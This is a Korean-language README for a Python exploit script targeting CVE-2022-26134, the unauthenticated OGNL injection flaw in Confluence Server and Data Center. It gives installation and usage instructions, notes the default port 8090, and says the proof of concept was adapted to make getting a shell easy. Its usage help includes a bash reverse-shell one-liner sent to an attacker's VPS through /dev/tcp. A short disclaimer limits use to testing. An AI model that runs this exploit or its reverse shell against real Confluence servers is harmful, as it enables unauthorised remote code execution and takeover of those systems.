
원격 공격자가 Confluence에서 인증 없이 OGNL 표현식을 구성하여 주입함으로써 Confluence Server 또는 Data Center에서 임의 코드를 실행할 수 있으며, 기존 스크립트에서 PoC를 수정하여 getshell을 용이하게 합니다.
원격 공격자는 인증 없이 OGNL 표현식을 구성하여 주입하고, Confluence Server 또는 Data Center에서 임의의 코드를 실행할 수 있습니다. poc를 수정하여 getshell을 쉽게 합니다. 일반 포트: 8090
pip3 install requests
______ _______ ____ ___ ____ ____ ____ __ _ _____ _ _
/ ___\ \ / | ____| |___ \ / _ |___ \|___ \ |___ \ / /_ / |___ /| || |
| | \ \ / /| _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_
| |___ \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__ _|
\____| \_/ |_____| |_____|\___|_____|_____| |_____|\___/|_|____/ |_|
usage: CVE-2022-26134.py [-h] -t TARGET -c COMMAND
CVE-2022-26134
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
대상 URL
-c COMMAND, --command COMMAND
명령 실행(execute command), get shell: /bin/bash -c bash -i >& /dev/tcp/{vps ip}/{vps port} 0>&1
python3 CVE-2022-26134.py -t [server ip] -c [command] //명령 실행
이 스크립트는 테스트 목적으로만 사용할 수 있으며 다른 용도로 사용하지 마십시오.